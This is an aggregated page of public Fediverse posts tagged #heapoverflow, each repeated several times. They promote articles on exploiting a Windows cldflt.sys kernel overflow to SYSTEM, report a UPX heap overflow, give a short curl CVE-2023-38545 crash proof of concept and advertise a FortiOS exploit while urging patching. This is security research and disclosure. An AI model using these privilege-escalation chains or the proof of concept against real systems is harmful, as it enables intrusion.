home.social

#heapoverflow — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #heapoverflow, aggregated by home.social.

  1. Exploiting Reversing (ER) series: article 09 | Exploitation Techniques: CVE-2024-30085 (part 03)

    Today I am releasing the nineth article in the Exploiting Reversing Series (ERS). In “Exploitation Techniques | CVE-2024-30085 (Part 09)” I provide a 106-page deep dive and a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/04/2

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit editions built on the cldflt.sys heap overflow.
    [+] PreviousMode Edition: Exploit cldflt.sys via WNF OOB + Pipe Attributes + ALPC + _KTHREAD.PreviousMode flip: elevation of privilege of a regular user to SYSTEM.
    [+] PPL Bypass Edition: Exploit cldflt.sys via WNF OOB + PreviousMode flip + _EPROCESS.Protection strip + MiniDumpWriteDump: elevation of regular user to SYSTEM.
    [+] Solid Reliability: Two complete, stable exploits, including a multi-step cleanup phase that restores the corrupted pipe attribute Flink and _KTHREAD.PreviousMode before process exit, preventing crash on cleanup.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    The following articles will continue the miniseries about iOS and Chrome, which are my areas of research.

    Enjoy the reading and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow

  2. Exploiting Reversing (ER) series: article 09 | Exploitation Techniques: CVE-2024-30085 (part 03)

    Today I am releasing the nineth article in the Exploiting Reversing Series (ERS). In “Exploitation Techniques | CVE-2024-30085 (Part 09)” I provide a 106-page deep dive and a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/04/2

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit editions built on the cldflt.sys heap overflow.
    [+] PreviousMode Edition: Exploit cldflt.sys via WNF OOB + Pipe Attributes + ALPC + _KTHREAD.PreviousMode flip: elevation of privilege of a regular user to SYSTEM.
    [+] PPL Bypass Edition: Exploit cldflt.sys via WNF OOB + PreviousMode flip + _EPROCESS.Protection strip + MiniDumpWriteDump: elevation of regular user to SYSTEM.
    [+] Solid Reliability: Two complete, stable exploits, including a multi-step cleanup phase that restores the corrupted pipe attribute Flink and _KTHREAD.PreviousMode before process exit, preventing crash on cleanup.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    The following articles will continue the miniseries about iOS and Chrome, which are my areas of research.

    Enjoy the reading and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow

  3. Exploiting Reversing (ER) series: article 09 | Exploitation Techniques: CVE-2024-30085 (part 03)

    Today I am releasing the nineth article in the Exploiting Reversing Series (ERS). In “Exploitation Techniques | CVE-2024-30085 (Part 09)” I provide a 106-page deep dive and a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/04/2

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit editions built on the cldflt.sys heap overflow.
    [+] PreviousMode Edition: Exploit cldflt.sys via WNF OOB + Pipe Attributes + ALPC + _KTHREAD.PreviousMode flip: elevation of privilege of a regular user to SYSTEM.
    [+] PPL Bypass Edition: Exploit cldflt.sys via WNF OOB + PreviousMode flip + _EPROCESS.Protection strip + MiniDumpWriteDump: elevation of regular user to SYSTEM.
    [+] Solid Reliability: Two complete, stable exploits, including a multi-step cleanup phase that restores the corrupted pipe attribute Flink and _KTHREAD.PreviousMode before process exit, preventing crash on cleanup.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    The following articles will continue the miniseries about iOS and Chrome, which are my areas of research.

    Enjoy the reading and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow

  4. Exploiting Reversing (ER) series: article 09 | Exploitation Techniques: CVE-2024-30085 (part 03)

    Today I am releasing the nineth article in the Exploiting Reversing Series (ERS). In “Exploitation Techniques | CVE-2024-30085 (Part 09)” I provide a 106-page deep dive and a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/04/2

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit editions built on the cldflt.sys heap overflow.
    [+] PreviousMode Edition: Exploit cldflt.sys via WNF OOB + Pipe Attributes + ALPC + _KTHREAD.PreviousMode flip: elevation of privilege of a regular user to SYSTEM.
    [+] PPL Bypass Edition: Exploit cldflt.sys via WNF OOB + PreviousMode flip + _EPROCESS.Protection strip + MiniDumpWriteDump: elevation of regular user to SYSTEM.
    [+] Solid Reliability: Two complete, stable exploits, including a multi-step cleanup phase that restores the corrupted pipe attribute Flink and _KTHREAD.PreviousMode before process exit, preventing crash on cleanup.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    The following articles will continue the miniseries about iOS and Chrome, which are my areas of research.

    Enjoy the reading and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow

  5. Exploiting Reversing (ER) series: article 09 | Exploitation Techniques: CVE-2024-30085 (part 03)

    Today I am releasing the nineth article in the Exploiting Reversing Series (ERS). In “Exploitation Techniques | CVE-2024-30085 (Part 09)” I provide a 106-page deep dive and a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/04/2

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit editions built on the cldflt.sys heap overflow.
    [+] PreviousMode Edition: Exploit cldflt.sys via WNF OOB + Pipe Attributes + ALPC + _KTHREAD.PreviousMode flip: elevation of privilege of a regular user to SYSTEM.
    [+] PPL Bypass Edition: Exploit cldflt.sys via WNF OOB + PreviousMode flip + _EPROCESS.Protection strip + MiniDumpWriteDump: elevation of regular user to SYSTEM.
    [+] Solid Reliability: Two complete, stable exploits, including a multi-step cleanup phase that restores the corrupted pipe attribute Flink and _KTHREAD.PreviousMode before process exit, preventing crash on cleanup.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    The following articles will continue the miniseries about iOS and Chrome, which are my areas of research.

    Enjoy the reading and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow

  6. The eighth article of the Exploiting Reversing Series (ERS) is now live. Titled “Exploitation Techniques | CVE-2024-30085 (Part 02)” this 91-page technical guide offers a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/03/3

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit versions leveraging the I/O Ring mechanism.
    [+] Exploit ALPC + WNF OOB + Pipe Attributes + I/O Ring: elevation of privilege of a regular user to SYSTEM.
    [+] Replaced ALPC one-shot write with Pipe Attribute spray for I/O Ring RegBuffers corruption: more reliable adjacency control.
    [+] Exploit WNF OOB + I/O Ring Read/Write: elevation of privilege of a regular user to SYSTEM.
    [+] Pure I/O Ring primitive: eliminated ALPC dependency entirely. WNF overflow directly corrupts I/O Ring RegBuffers for arbitrary kernel read/write.
    [+] Solid Reliability: Two complete, stable exploits, including an improved cleanup stage.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    Enjoy the read and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow #ioring

  7. The eighth article of the Exploiting Reversing Series (ERS) is now live. Titled “Exploitation Techniques | CVE-2024-30085 (Part 02)” this 91-page technical guide offers a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/03/3

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit versions leveraging the I/O Ring mechanism.
    [+] Exploit ALPC + WNF OOB + Pipe Attributes + I/O Ring: elevation of privilege of a regular user to SYSTEM.
    [+] Replaced ALPC one-shot write with Pipe Attribute spray for I/O Ring RegBuffers corruption: more reliable adjacency control.
    [+] Exploit WNF OOB + I/O Ring Read/Write: elevation of privilege of a regular user to SYSTEM.
    [+] Pure I/O Ring primitive: eliminated ALPC dependency entirely. WNF overflow directly corrupts I/O Ring RegBuffers for arbitrary kernel read/write.
    [+] Solid Reliability: Two complete, stable exploits, including an improved cleanup stage.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    Enjoy the read and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow #ioring

  8. The eighth article of the Exploiting Reversing Series (ERS) is now live. Titled “Exploitation Techniques | CVE-2024-30085 (Part 02)” this 91-page technical guide offers a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/03/3

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit versions leveraging the I/O Ring mechanism.
    [+] Exploit ALPC + WNF OOB + Pipe Attributes + I/O Ring: elevation of privilege of a regular user to SYSTEM.
    [+] Replaced ALPC one-shot write with Pipe Attribute spray for I/O Ring RegBuffers corruption: more reliable adjacency control.
    [+] Exploit WNF OOB + I/O Ring Read/Write: elevation of privilege of a regular user to SYSTEM.
    [+] Pure I/O Ring primitive: eliminated ALPC dependency entirely. WNF overflow directly corrupts I/O Ring RegBuffers for arbitrary kernel read/write.
    [+] Solid Reliability: Two complete, stable exploits, including an improved cleanup stage.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    Enjoy the read and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow #ioring

  9. The eighth article of the Exploiting Reversing Series (ERS) is now live. Titled “Exploitation Techniques | CVE-2024-30085 (Part 02)” this 91-page technical guide offers a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/03/3

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit versions leveraging the I/O Ring mechanism.
    [+] Exploit ALPC + WNF OOB + Pipe Attributes + I/O Ring: elevation of privilege of a regular user to SYSTEM.
    [+] Replaced ALPC one-shot write with Pipe Attribute spray for I/O Ring RegBuffers corruption: more reliable adjacency control.
    [+] Exploit WNF OOB + I/O Ring Read/Write: elevation of privilege of a regular user to SYSTEM.
    [+] Pure I/O Ring primitive: eliminated ALPC dependency entirely. WNF overflow directly corrupts I/O Ring RegBuffers for arbitrary kernel read/write.
    [+] Solid Reliability: Two complete, stable exploits, including an improved cleanup stage.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    Enjoy the read and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow #ioring

  10. The eighth article of the Exploiting Reversing Series (ERS) is now live. Titled “Exploitation Techniques | CVE-2024-30085 (Part 02)” this 91-page technical guide offers a comprehensive roadmap for vulnerability exploitation:

    exploitreversing.com/2026/03/3

    Key features of this edition:

    [+] Dual Exploit Strategies: Two distinct exploit versions leveraging the I/O Ring mechanism.
    [+] Exploit ALPC + WNF OOB + Pipe Attributes + I/O Ring: elevation of privilege of a regular user to SYSTEM.
    [+] Replaced ALPC one-shot write with Pipe Attribute spray for I/O Ring RegBuffers corruption: more reliable adjacency control.
    [+] Exploit WNF OOB + I/O Ring Read/Write: elevation of privilege of a regular user to SYSTEM.
    [+] Pure I/O Ring primitive: eliminated ALPC dependency entirely. WNF overflow directly corrupts I/O Ring RegBuffers for arbitrary kernel read/write.
    [+] Solid Reliability: Two complete, stable exploits, including an improved cleanup stage.

    This article guides you through two additional techniques for exploiting the CVE-2024-30085 Heap Buffer Overflow. While demonstrated here, these methods can be adapted as exploitation techniques for many other kernel targets.

    I hope this serves as a definitive resource for your research. If you find it helpful, please feel free to share it or reach out with your feedback!

    Enjoy the read and have an excellent day.

    #exploit #exploitdevelopment #windows #exploitation #vulnerability #minifilterdriver #kernel #heapoverflow #ioring

  11. Heap Buffer Overflow in UPX Identified

    Date: March 26, 2024
    CVE: To be assigned
    Vulnerability Type: Buffer Errors
    CWE: [[CWE-122]]
    Sources: NIST VULNDB VULNDB Submit

    Issue Summary

    A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

    Technical Key findings

    The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

    Vulnerable products

    • [[UPX]] version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

    Impact assessment

    An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

    Patches or workaround

    No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.

    Tags

    #UPX #BufferOverflow #HeapOverflow #SecurityVulnerability #CVE

  12. Heap Buffer Overflow in UPX Identified

    Date: March 26, 2024
    CVE: To be assigned
    Vulnerability Type: Buffer Errors
    CWE: [[CWE-122]]
    Sources: NIST VULNDB VULNDB Submit

    Issue Summary

    A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

    Technical Key findings

    The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

    Vulnerable products

    • [[UPX]] version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

    Impact assessment

    An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

    Patches or workaround

    No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.

    Tags

    #UPX #BufferOverflow #HeapOverflow #SecurityVulnerability #CVE

  13. Heap Buffer Overflow in UPX Identified

    Date: March 26, 2024
    CVE: To be assigned
    Vulnerability Type: Buffer Errors
    CWE: [[CWE-122]]
    Sources: NIST VULNDB VULNDB Submit

    Issue Summary

    A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

    Technical Key findings

    The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

    Vulnerable products

    • [[UPX]] version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

    Impact assessment

    An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

    Patches or workaround

    No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.

    Tags

    #UPX #BufferOverflow #HeapOverflow #SecurityVulnerability #CVE

  14. Heap Buffer Overflow in UPX Identified

    Date: March 26, 2024
    CVE: To be assigned
    Vulnerability Type: Buffer Errors
    CWE: [[CWE-122]]
    Sources: NIST VULNDB VULNDB Submit

    Issue Summary

    A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

    Technical Key findings

    The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

    Vulnerable products

    • [[UPX]] version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

    Impact assessment

    An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

    Patches or workaround

    No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.

    Tags

    #UPX #BufferOverflow #HeapOverflow #SecurityVulnerability #CVE

  15. Heap Buffer Overflow in UPX Identified

    Date: March 26, 2024
    CVE: To be assigned
    Vulnerability Type: Buffer Errors
    CWE: [[CWE-122]]
    Sources: NIST VULNDB VULNDB Submit

    Issue Summary

    A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

    Technical Key findings

    The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

    Vulnerable products

    • [[UPX]] version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

    Impact assessment

    An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

    Patches or workaround

    No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.

    Tags

    #UPX #BufferOverflow #HeapOverflow #SecurityVulnerability #CVE

  16. Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

    gcc -xc -fsanitize=address - -lcurl <<EOF
    # include <curl/curl.h>
    # include <string.h>
    int main(void)
    {
    CURL *curl = curl_easy_init();
    if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    }
    return 0;
    }
    EOF
    https_proxy=socks5h://127.0.0.1 ./a.out

    Some comments:
    • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
    • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
    • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
    • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.

    #infosec

  17. Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

    gcc -xc -fsanitize=address - -lcurl <<EOF
    # include <curl/curl.h>
    # include <string.h>
    int main(void)
    {
    CURL *curl = curl_easy_init();
    if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    }
    return 0;
    }
    EOF
    https_proxy=socks5h://127.0.0.1 ./a.out

    Some comments:
    • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
    • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
    • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
    • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.

    #infosec

  18. Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

    gcc -xc -fsanitize=address - -lcurl <<EOF
    # include <curl/curl.h>
    # include <string.h>
    int main(void)
    {
    CURL *curl = curl_easy_init();
    if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    }
    return 0;
    }
    EOF
    https_proxy=socks5h://127.0.0.1 ./a.out

    Some comments:
    • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
    • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
    • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
    • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.

    #infosec

  19. Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

    gcc -xc -fsanitize=address - -lcurl <<EOF
    # include <curl/curl.h>
    # include <string.h>
    int main(void)
    {
    CURL *curl = curl_easy_init();
    if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    }
    return 0;
    }
    EOF
    https_proxy=socks5h://127.0.0.1 ./a.out

    Some comments:
    • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
    • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
    • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
    • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.

    #infosec

  20. Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

    gcc -xc -fsanitize=address - -lcurl <<EOF
    # include <curl/curl.h>
    # include <string.h>
    int main(void)
    {
    CURL *curl = curl_easy_init();
    if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    }
    return 0;
    }
    EOF
    https_proxy=socks5h://127.0.0.1 ./a.out

    Some comments:
    • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
    • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
    • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
    • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.

    #infosec

  21. We internally developed an #exploit for #CVE-2023-27997, a #heapoverflow in #FortiOS (OS behind #FortiGate firewalls) that allows #RCE. 490,000 affected SSL VPN interfaces are exposed online & about 69% of them are currently unpatched. Patch yours now. bfx.social/439HtF3

  22. We internally developed an #exploit for #CVE-2023-27997, a #heapoverflow in #FortiOS (OS behind #FortiGate firewalls) that allows #RCE. 490,000 affected SSL VPN interfaces are exposed online & about 69% of them are currently unpatched. Patch yours now. bfx.social/439HtF3

  23. We internally developed an #exploit for #CVE-2023-27997, a #heapoverflow in #FortiOS (OS behind #FortiGate firewalls) that allows #RCE. 490,000 affected SSL VPN interfaces are exposed online & about 69% of them are currently unpatched. Patch yours now. bfx.social/439HtF3

  24. We internally developed an #exploit for #CVE-2023-27997, a #heapoverflow in #FortiOS (OS behind #FortiGate firewalls) that allows #RCE. 490,000 affected SSL VPN interfaces are exposed online & about 69% of them are currently unpatched. Patch yours now. bfx.social/439HtF3

  25. We internally developed an #exploit for #CVE-2023-27997, a #heapoverflow in #FortiOS (OS behind #FortiGate firewalls) that allows #RCE. 490,000 affected SSL VPN interfaces are exposed online & about 69% of them are currently unpatched. Patch yours now. bfx.social/439HtF3

  26. Just published a big pile of #research I did this past winter! Protocol #reverseengineering, #heapoverflow, #stackoverflow, #authbypass - lots of cool stuff. If you think this sounds cool, be sure to check out my #NorthSec talk in May :)

    Here are some links:

    If you're running #RocketSoftware's UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!

  27. Just published a big pile of #research I did this past winter! Protocol #reverseengineering, #heapoverflow, #stackoverflow, #authbypass - lots of cool stuff. If you think this sounds cool, be sure to check out my #NorthSec talk in May :)

    Here are some links:

    If you're running #RocketSoftware's UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!

  28. Just published a big pile of #research I did this past winter! Protocol #reverseengineering, #heapoverflow, #stackoverflow, #authbypass - lots of cool stuff. If you think this sounds cool, be sure to check out my #NorthSec talk in May :)

    Here are some links:

    If you're running #RocketSoftware's UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!

  29. Just published a big pile of #research I did this past winter! Protocol #reverseengineering, #heapoverflow, #stackoverflow, #authbypass - lots of cool stuff. If you think this sounds cool, be sure to check out my #NorthSec talk in May :)

    Here are some links:

    If you're running #RocketSoftware's UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!

  30. Just published a big pile of #research I did this past winter! Protocol #reverseengineering, #heapoverflow, #stackoverflow, #authbypass - lots of cool stuff. If you think this sounds cool, be sure to check out my #NorthSec talk in May :)

    Here are some links:

    If you're running #RocketSoftware's UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!